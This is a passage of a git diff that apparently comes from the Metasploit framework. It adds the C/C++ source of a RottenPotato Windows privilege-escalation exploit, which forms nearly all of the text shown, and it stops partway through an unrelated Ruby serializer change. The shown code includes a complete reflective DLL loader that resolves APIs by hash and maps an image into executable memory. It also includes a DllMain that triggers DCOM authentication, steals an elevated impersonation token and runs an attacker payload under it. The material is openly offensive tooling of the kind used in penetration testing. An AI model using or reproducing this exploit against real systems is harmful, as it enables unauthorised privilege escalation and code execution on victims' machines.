== KERNEL32DLL_HASH) + { + // get this modules base address + uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; + + // get the VA of the modules NT Header + uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; + + // uiNameArray = the address of the modules export directory entry + uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; + + // get the VA of the export directory + uiExportDir = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress); + + // get the VA for the array of name pointers + uiNameArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNames); + + // get the VA for the array of name ordinals + uiNameOrdinals = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNameOrdinals); + + usCounter = 3; +#ifdef ENABLE_STOPPAGING + usCounter++; +#endif +#ifdef ENABLE_OUTPUTDEBUGSTRING + usCounter++; +#endif + + // loop while we still have imports to find + while (usCounter > 0) + { + // compute the hash values for this function name + dwHashValue = _hash((char *)(uiBaseAddress + DEREF_32(uiNameArray))); + + // if we have found a function we want we get its virtual address + if (dwHashValue == LOADLIBRARYA_HASH + || dwHashValue == GETPROCADDRESS_HASH + || dwHashValue == VIRTUALALLOC_HASH +#ifdef ENABLE_STOPPAGING + || dwHashValue == VIRTUALLOCK_HASH +#endif +#ifdef ENABLE_OUTPUTDEBUGSTRING + || dwHashValue == OUTPUTDEBUG_HASH +#endif + ) + { + // get the VA for the array of addresses + uiAddressArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions); + + // use this functions name ordinal as an index into the array of name pointers + uiAddressArray += (DEREF_16(uiNameOrdinals) * sizeof(DWORD)); + + // store this functions VA + if (dwHashValue == LOADLIBRARYA_HASH) + pLoadLibraryA = (LOADLIBRARYA)(uiBaseAddress + DEREF_32(uiAddressArray)); + else if (dwHashValue == GETPROCADDRESS_HASH) + pGetProcAddress = (GETPROCADDRESS)(uiBaseAddress + DEREF_32(uiAddressArray)); + else if (dwHashValue == VIRTUALALLOC_HASH) + pVirtualAlloc = (VIRTUALALLOC)(uiBaseAddress + DEREF_32(uiAddressArray)); +#ifdef ENABLE_STOPPAGING + else if (dwHashValue == VIRTUALLOCK_HASH) + pVirtualLock = (VIRTUALLOCK)(uiBaseAddress + DEREF_32(uiAddressArray)); +#endif +#ifdef ENABLE_OUTPUTDEBUGSTRING + else if (dwHashValue == OUTPUTDEBUG_HASH) + pOutputDebug = (OUTPUTDEBUG)(uiBaseAddress + DEREF_32(uiAddressArray)); +#endif + + // decrement our counter + usCounter--; + } + + // get the next exported function name + uiNameArray += sizeof(DWORD); + + // get the next exported function name ordinal + uiNameOrdinals += sizeof(WORD); + } + } + else if ((DWORD)uiValueC == NTDLLDLL_HASH) + { + // get this modules base address + uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; + + // get the VA of the modules NT Header + uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; + + // uiNameArray = the address of the modules export directory entry + uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; + + // get the VA of the export directory + uiExportDir = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress); + + // get the VA for the array of name pointers + uiNameArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNames); + + // get the VA for the array of name ordinals + uiNameOrdinals = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNameOrdinals); + + usCounter = 1; + + // loop while we still have imports to find + while (usCounter > 0) + { + // compute the hash values for this function name + dwHashValue = _hash((char *)(uiBaseAddress + DEREF_32(uiNameArray))); + + // if we have found a function we want we get its virtual address + if (dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH) + { + // get the VA for the array of addresses + uiAddressArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions); + + // use this functions name ordinal as an index into the array of name pointers + uiAddressArray += (DEREF_16(uiNameOrdinals) * sizeof(DWORD)); + + // store this functions VA + if (dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH) + pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)(uiBaseAddress + DEREF_32(uiAddressArray)); + + // decrement our counter + usCounter--; + } + + // get the next exported function name + uiNameArray += sizeof(DWORD); + + // get the next exported function name ordinal + uiNameOrdinals += sizeof(WORD); + } + } + + // we stop searching when we have found everything we need. + if (pLoadLibraryA + && pGetProcAddress + && pVirtualAlloc +#ifdef ENABLE_STOPPAGING + && pVirtualLock +#endif + && pNtFlushInstructionCache +#ifdef ENABLE_OUTPUTDEBUGSTRING + && pOutputDebug +#endif + ) + break; + + // get the next entry + uiValueA = DEREF(uiValueA); + } + + // STEP 2: load our image into a new permanent location in memory... + + // get the VA of the NT Header for the PE to be loaded + uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; + + // allocate all the memory for the DLL to be loaded into. we can load at any address because we will + // relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems. + uiBaseAddress = (ULONG_PTR)pVirtualAlloc(NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + +#ifdef ENABLE_STOPPAGING + // prevent our image from being swapped to the pagefile + pVirtualLock((LPVOID)uiBaseAddress, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage); +#endif + + // we must now copy over the headers + uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders; + uiValueB = uiLibraryAddress; + uiValueC = uiBaseAddress; + + while (uiValueA--) + *(BYTE *)uiValueC++ = *(BYTE *)uiValueB++; + + // STEP 3: load in all of our sections... + + // uiValueA = the VA of the first section + uiValueA = ((ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader); + + // itterate through all sections, loading them into memory. + uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections; + while (uiValueE--) + { + // uiValueB is the VA for this section + uiValueB = (uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress); + + // uiValueC if the VA for this sections data + uiValueC = (uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData); + + // copy the section over + uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData; + + while (uiValueD--) + *(BYTE *)uiValueB++ = *(BYTE *)uiValueC++; + + // get the VA of the next section + uiValueA += sizeof(IMAGE_SECTION_HEADER); + } + + // STEP 4: process our images import table... + + // uiValueB = the address of the import directory + uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT]; + + // we assume there is an import table to process + // uiValueC is the first entry in the import table + uiValueC = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress); + + // iterate through all imports until a null RVA is found (Characteristics is mis-named) + while (((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Characteristics) + { + OUTPUTDBG("Loading library: "); + OUTPUTDBG((LPCSTR)(uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name)); + OUTPUTDBG("\n"); + + // use LoadLibraryA to load the imported module into memory + uiLibraryAddress = (ULONG_PTR)pLoadLibraryA((LPCSTR)(uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name)); + + if (!uiLibraryAddress) + { + OUTPUTDBG("Loading library FAILED\n"); + + uiValueC += sizeof(IMAGE_IMPORT_DESCRIPTOR); + continue; + } + + // uiValueD = VA of the OriginalFirstThunk + uiValueD = (uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk); + + // uiValueA = VA of the IAT (via first thunk not origionalfirstthunk) + uiValueA = (uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk); + + // itterate through all imported functions, importing by ordinal if no name present + while (DEREF(uiValueA)) + { + // sanity check uiValueD as some compilers only import by FirstThunk + if (uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG) + { + // get the VA of the modules NT Header + uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; + + // uiNameArray = the address of the modules export directory entry + uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; + + // get the VA of the export directory + uiExportDir = (uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress); + + // get the VA for the array of addresses + uiAddressArray = (uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions); + + // use the import ordinal (- export ordinal base) as an index into the array of addresses + uiAddressArray += ((IMAGE_ORDINAL(((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal) - ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->Base) * sizeof(DWORD)); + + // patch in the address for this imported function + DEREF(uiValueA) = (uiLibraryAddress + DEREF_32(uiAddressArray)); + } + else + { + // get the VA of this functions import by name struct + uiValueB = (uiBaseAddress + DEREF(uiValueA)); + + OUTPUTDBG("Resolving function: "); + OUTPUTDBG(((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name); + OUTPUTDBG("\n"); + + // use GetProcAddress and patch in the address for this imported function + DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress((HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name); + } + // get the next imported function + uiValueA += sizeof(ULONG_PTR); + if (uiValueD) + uiValueD += sizeof(ULONG_PTR); + } + + // get the next import + uiValueC += sizeof(IMAGE_IMPORT_DESCRIPTOR); + } + + // STEP 5: process all of our images relocations... + + // calculate the base address delta and perform relocations (even if we load at desired image base) + uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase; + + // uiValueB = the address of the relocation directory + uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC]; + + // check if their are any relocations present + if (((PIMAGE_DATA_DIRECTORY)uiValueB)->Size) + { + uiValueE = ((PIMAGE_BASE_RELOCATION)uiValueB)->SizeOfBlock; + + // uiValueC is now the first entry (IMAGE_BASE_RELOCATION) + uiValueC = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress); + + // and we itterate through all entries... + while (uiValueE && ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock) + { + // uiValueA = the VA for this relocation block + uiValueA = (uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress); + + // uiValueB = number of entries in this relocation block + uiValueB = (((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(IMAGE_RELOC); + + // uiValueD is now the first entry in the current relocation block + uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION); + + // we itterate through all the entries in the current block... + while (uiValueB--) + { + // perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required. + // we dont use a switch statement to avoid the compiler building a jump table + // which would not be very position independent! + if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64) + *(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress; + else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW) + *(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress; +#ifdef WIN_ARM + // Note: On ARM, the compiler optimization /O2 seems to introduce an off by one issue, possibly a code gen bug. Using /O1 instead avoids this problem. + else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_ARM_MOV32T) + { + register DWORD dwInstruction; + register DWORD dwAddress; + register WORD wImm; + // get the MOV.T instructions DWORD value (We add 4 to the offset to go past the first MOV.W which handles the low word) + dwInstruction = *(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD)); + // flip the words to get the instruction as expected + dwInstruction = MAKELONG(HIWORD(dwInstruction), LOWORD(dwInstruction)); + // sanity chack we are processing a MOV instruction... + if ((dwInstruction & ARM_MOV_MASK) == ARM_MOVT) + { + // pull out the encoded 16bit value (the high portion of the address-to-relocate) + wImm = (WORD)(dwInstruction & 0x000000FF); + wImm |= (WORD)((dwInstruction & 0x00007000) >> 4); + wImm |= (WORD)((dwInstruction & 0x04000000) >> 15); + wImm |= (WORD)((dwInstruction & 0x000F0000) >> 4); + // apply the relocation to the target address + dwAddress = ((WORD)HIWORD(uiLibraryAddress) + wImm) & 0xFFFF; + // now create a new instruction with the same opcode and register param. + dwInstruction = (DWORD)(dwInstruction & ARM_MOV_MASK2); + // patch in the relocated address... + dwInstruction |= (DWORD)(dwAddress & 0x00FF); + dwInstruction |= (DWORD)(dwAddress & 0x0700) << 4; + dwInstruction |= (DWORD)(dwAddress & 0x0800) << 15; + dwInstruction |= (DWORD)(dwAddress & 0xF000) << 4; + // now flip the instructions words and patch back into the code... + *(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD)) = MAKELONG(HIWORD(dwInstruction), LOWORD(dwInstruction)); + } + } +#endif + else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH) + *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress); + else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW) + *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress); + + // get the next entry in the current relocation block + uiValueD += sizeof(IMAGE_RELOC); + } + + uiValueE -= ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock; + // get the next entry in the relocation directory + uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock; + } + } + + // STEP 6: call our images entry point + + // uiValueA = the VA of our newly loaded DLL/EXE's entry point + uiValueA = (uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint); + + OUTPUTDBG("Flushing the instruction cache"); + // We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing. + pNtFlushInstructionCache((HANDLE)-1, NULL, 0); + + // call our respective entry point, fudging our hInstance value +#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR + // if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter) + ((DLLMAIN)uiValueA)((HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter); +#else + // if we are injecting an DLL via a stub we call DllMain with no parameter + ((DLLMAIN)uiValueA)((HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL); +#endif + + // STEP 8: return our new entry point address so whatever called us can call DllMain() if needed. + return uiValueA; +} +//===============================================================================================// +#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN + +// you must implement this function... +extern DWORD DLLEXPORT Init(SOCKET socket); + +BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) +{ + BOOL bReturnValue = TRUE; + + switch (dwReason) + { + case DLL_QUERY_HMODULE: + if (lpReserved != NULL) + *(HMODULE *)lpReserved = hAppInstance; + break; + case DLL_PROCESS_ATTACH: + hAppInstance = hinstDLL; + break; + case DLL_PROCESS_DETACH: + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + break; + } + return bReturnValue; +} + +#endif +//===============================================================================================// diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato/ReflectiveLoader.h b/external/source/exploits/rottenpotato/MSFRottenPotato/ReflectiveLoader.h new file mode 100644 index 0000000000..efe9962387 --- /dev/null +++ b/external/source/exploits/rottenpotato/MSFRottenPotato/ReflectiveLoader.h @@ -0,0 +1,223 @@ +//===============================================================================================// +// Copyright (c) 2013, Stephen Fewer of Harmony Security (www.harmonysecurity.com) +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without modification, are permitted +// provided that the following conditions are met: +// +// * Redistributions of source code must retain the above copyright notice, this list of +// conditions and the following disclaimer. +// +// * Redistributions in binary form must reproduce the above copyright notice, this list of +// conditions and the following disclaimer in the documentation and/or other materials provided +// with the distribution. +// +// * Neither the name of Harmony Security nor the names of its contributors may be used to +// endorse or promote products derived from this software without specific prior written permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR +// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND +// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR +// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR +// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE +// POSSIBILITY OF SUCH DAMAGE. +//===============================================================================================// +#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H +#define _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H +//===============================================================================================// +#define WIN32_LEAN_AND_MEAN +#include +#include +#include + +#include "ReflectiveDLLInjection.h" + +// Enable this define to turn on OutputDebugString support +//#define ENABLE_OUTPUTDEBUGSTRING 1 + +// Enable this define to turn on locking of memory to prevent paging +#define ENABLE_STOPPAGING 1 + +#define EXITFUNC_SEH 0xEA320EFE +#define EXITFUNC_THREAD 0x0A2A1DE0 +#define EXITFUNC_PROCESS 0x56A2B5F0 + +typedef HMODULE(WINAPI * LOADLIBRARYA)(LPCSTR); +typedef FARPROC(WINAPI * GETPROCADDRESS)(HMODULE, LPCSTR); +typedef LPVOID(WINAPI * VIRTUALALLOC)(LPVOID, SIZE_T, DWORD, DWORD); +typedef DWORD(NTAPI * NTFLUSHINSTRUCTIONCACHE)(HANDLE, PVOID, ULONG); + +#define KERNEL32DLL_HASH 0x6A4ABC5B +#define NTDLLDLL_HASH 0x3CFA685D + +#define LOADLIBRARYA_HASH 0xEC0E4E8E +#define GETPROCADDRESS_HASH 0x7C0DFCAA +#define VIRTUALALLOC_HASH 0x91AFCA54 +#define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8 + +#ifdef ENABLE_STOPPAGING +typedef LPVOID(WINAPI * VIRTUALLOCK)(LPVOID, SIZE_T); +#define VIRTUALLOCK_HASH 0x0EF632F2 +#endif + +#ifdef ENABLE_OUTPUTDEBUGSTRING +typedef LPVOID(WINAPI * OUTPUTDEBUG)(LPCSTR); +#define OUTPUTDEBUG_HASH 0x470D22BC +#endif + +#define IMAGE_REL_BASED_ARM_MOV32A 5 +#define IMAGE_REL_BASED_ARM_MOV32T 7 + +#define ARM_MOV_MASK (DWORD)(0xFBF08000) +#define ARM_MOV_MASK2 (DWORD)(0xFBF08F00) +#define ARM_MOVW 0xF2400000 +#define ARM_MOVT 0xF2C00000 + +#define HASH_KEY 13 +//===============================================================================================// +#pragma intrinsic( _rotr ) + +__forceinline DWORD ror(DWORD d) +{ + return _rotr(d, HASH_KEY); +} + +__forceinline DWORD _hash(char * c) +{ + register DWORD h = 0; + do + { + h = ror(h); + h += *c; + } while (*++c); + + return h; +} +//===============================================================================================// +typedef struct _UNICODE_STR +{ + USHORT Length; + USHORT MaximumLength; + PWSTR pBuffer; +} UNICODE_STR, *PUNICODE_STR; + +// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY +//__declspec( align(8) ) +typedef struct _LDR_DATA_TABLE_ENTRY +{ + //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry. + LIST_ENTRY InMemoryOrderModuleList; + LIST_ENTRY InInitializationOrderModuleList; + PVOID DllBase; + PVOID EntryPoint; + ULONG SizeOfImage; + UNICODE_STR FullDllName; + UNICODE_STR BaseDllName; + ULONG Flags; + SHORT LoadCount; + SHORT TlsIndex; + LIST_ENTRY HashTableEntry; + ULONG TimeDateStamp; +} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; + +// WinDbg> dt -v ntdll!_PEB_LDR_DATA +typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes +{ + DWORD dwLength; + DWORD dwInitialized; + LPVOID lpSsHandle; + LIST_ENTRY InLoadOrderModuleList; + LIST_ENTRY InMemoryOrderModuleList; + LIST_ENTRY InInitializationOrderModuleList; + LPVOID lpEntryInProgress; +} PEB_LDR_DATA, *PPEB_LDR_DATA; + +// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK +typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes +{ + struct _PEB_FREE_BLOCK * pNext; + DWORD dwSize; +} PEB_FREE_BLOCK, *PPEB_FREE_BLOCK; + +// struct _PEB is defined in Winternl.h but it is incomplete +// WinDbg> dt -v ntdll!_PEB +typedef struct __PEB // 65 elements, 0x210 bytes +{ + BYTE bInheritedAddressSpace; + BYTE bReadImageFileExecOptions; + BYTE bBeingDebugged; + BYTE bSpareBool; + LPVOID lpMutant; + LPVOID lpImageBaseAddress; + PPEB_LDR_DATA pLdr; + LPVOID lpProcessParameters; + LPVOID lpSubSystemData; + LPVOID lpProcessHeap; + PRTL_CRITICAL_SECTION pFastPebLock; + LPVOID lpFastPebLockRoutine; + LPVOID lpFastPebUnlockRoutine; + DWORD dwEnvironmentUpdateCount; + LPVOID lpKernelCallbackTable; + DWORD dwSystemReserved; + DWORD dwAtlThunkSListPtr32; + PPEB_FREE_BLOCK pFreeList; + DWORD dwTlsExpansionCounter; + LPVOID lpTlsBitmap; + DWORD dwTlsBitmapBits[2]; + LPVOID lpReadOnlySharedMemoryBase; + LPVOID lpReadOnlySharedMemoryHeap; + LPVOID lpReadOnlyStaticServerData; + LPVOID lpAnsiCodePageData; + LPVOID lpOemCodePageData; + LPVOID lpUnicodeCaseTableData; + DWORD dwNumberOfProcessors; + DWORD dwNtGlobalFlag; + LARGE_INTEGER liCriticalSectionTimeout; + DWORD dwHeapSegmentReserve; + DWORD dwHeapSegmentCommit; + DWORD dwHeapDeCommitTotalFreeThreshold; + DWORD dwHeapDeCommitFreeBlockThreshold; + DWORD dwNumberOfHeaps; + DWORD dwMaximumNumberOfHeaps; + LPVOID lpProcessHeaps; + LPVOID lpGdiSharedHandleTable; + LPVOID lpProcessStarterHelper; + DWORD dwGdiDCAttributeList; + LPVOID lpLoaderLock; + DWORD dwOSMajorVersion; + DWORD dwOSMinorVersion; + WORD wOSBuildNumber; + WORD wOSCSDVersion; + DWORD dwOSPlatformId; + DWORD dwImageSubsystem; + DWORD dwImageSubsystemMajorVersion; + DWORD dwImageSubsystemMinorVersion; + DWORD dwImageProcessAffinityMask; + DWORD dwGdiHandleBuffer[34]; + LPVOID lpPostProcessInitRoutine; + LPVOID lpTlsExpansionBitmap; + DWORD dwTlsExpansionBitmapBits[32]; + DWORD dwSessionId; + ULARGE_INTEGER liAppCompatFlags; + ULARGE_INTEGER liAppCompatFlagsUser; + LPVOID lppShimData; + LPVOID lpAppCompatInfo; + UNICODE_STR usCSDVersion; + LPVOID lpActivationContextData; + LPVOID lpProcessAssemblyStorageMap; + LPVOID lpSystemDefaultActivationContextData; + LPVOID lpSystemAssemblyStorageMap; + DWORD dwMinimumStackCommit; +} _PEB, *_PPEB; + +typedef struct +{ + WORD offset : 12; + WORD type : 4; +} IMAGE_RELOC, *PIMAGE_RELOC; +//===============================================================================================// +#endif +//===============================================================================================// diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato/dllmain.cpp b/external/source/exploits/rottenpotato/MSFRottenPotato/dllmain.cpp new file mode 100644 index 0000000000..9168581f56 --- /dev/null +++ b/external/source/exploits/rottenpotato/MSFRottenPotato/dllmain.cpp @@ -0,0 +1,79 @@ +#include "stdafx.h" +#include "ReflectiveLoader.h" +#include "MSFRottenPotato.h" + +extern "C" HINSTANCE hAppInstance; +EXTERN_C IMAGE_DOS_HEADER __ImageBase; + +HANDLE ElevatedToken; + +VOID ExecutePayload(LPVOID lpPayload) +{ + SetThreadToken(NULL, ElevatedToken); + VOID(*lpCode)() = (VOID(*)())lpPayload; + lpCode(); +} + +int RottenPotato() +{ + CMSFRottenPotato* test = new CMSFRottenPotato(); + test->startCOMListenerThread(); + test->startRPCConnectionThread(); + test->triggerDCOM(); + int ret = 0; + while (true) { + if (test->negotiator->authResult != -1) { + /*Enable the priv if possible*/ + HANDLE hToken; + TOKEN_PRIVILEGES tkp; + + // Get a token for this process. + + if (!OpenProcessToken(GetCurrentProcess(), + TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))return 0; + + // Get the LUID for the Impersonate privilege. + int res = LookupPrivilegeValue(NULL, SE_IMPERSONATE_NAME, + &tkp.Privileges[0].Luid); + + tkp.PrivilegeCount = 1; // one privilege to set + tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; + + // Get the impersonate priv for this process. + res = AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES)NULL, 0); + + QuerySecurityContextToken(test->negotiator->phContext, &ElevatedToken); + + break; + } + else { + Sleep(500); + } + } + return ret; +} + + +BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) +{ + BOOL bReturnValue = TRUE; + DWORD dwResult = 0; + + switch (dwReason) + { + case DLL_QUERY_HMODULE: + if (lpReserved != NULL) + *(HMODULE *)lpReserved = hAppInstance; + break; + case DLL_PROCESS_ATTACH: + hAppInstance = hinstDLL; + RottenPotato(); + ExecutePayload(lpReserved); + break; + case DLL_PROCESS_DETACH: + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + break; + } + return bReturnValue; +} diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato/dump.stg b/external/source/exploits/rottenpotato/MSFRottenPotato/dump.stg new file mode 100644 index 0000000000..1d58a19ae5 Binary files /dev/null and b/external/source/exploits/rottenpotato/MSFRottenPotato/dump.stg differ diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato/stdafx.cpp b/external/source/exploits/rottenpotato/MSFRottenPotato/stdafx.cpp new file mode 100644 index 0000000000..02ca4e02bb --- /dev/null +++ b/external/source/exploits/rottenpotato/MSFRottenPotato/stdafx.cpp @@ -0,0 +1,8 @@ +// stdafx.cpp : source file that includes just the standard includes +// MSFRottenPotato.pch will be the pre-compiled header +// stdafx.obj will contain the pre-compiled type information + +#include "stdafx.h" + +// TODO: reference any additional headers you need in STDAFX.H +// and not in this file diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato/stdafx.h b/external/source/exploits/rottenpotato/MSFRottenPotato/stdafx.h new file mode 100644 index 0000000000..677e68a9fa --- /dev/null +++ b/external/source/exploits/rottenpotato/MSFRottenPotato/stdafx.h @@ -0,0 +1,16 @@ +// stdafx.h : include file for standard system include files, +// or project specific include files that are used frequently, but +// are changed infrequently +// + +#pragma once + +#include "targetver.h" + +#define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers +// Windows Header Files: +#include + + + +// TODO: reference additional headers your program requires here diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato/targetver.h b/external/source/exploits/rottenpotato/MSFRottenPotato/targetver.h new file mode 100644 index 0000000000..90e767bfce --- /dev/null +++ b/external/source/exploits/rottenpotato/MSFRottenPotato/targetver.h @@ -0,0 +1,8 @@ +#pragma once + +// Including SDKDDKVer.h defines the highest available Windows platform. + +// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and +// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. + +#include diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb index 5365179d31..16474a45bf 100644 --- a/lib/msf/base/serializer/readable_text.rb +++ b/lib/msf/base/serializer/readable_text.rb @@ -195,6 +195,36 @@ class ReadableText tbl.to_s + "\n" end + def self.dump_traits(mod, indent=' ') + output = '' + + unless mod.side_effects.empty? + output << "Module side effects:\n" + mod.side_effects.each { |side_effect| + output << indent + side_effect + "\n" + } + output << "\n" + end + + unless mod.stability.empty? + output << "Module stability:\n" + mod.stability.each { |stability| + output << 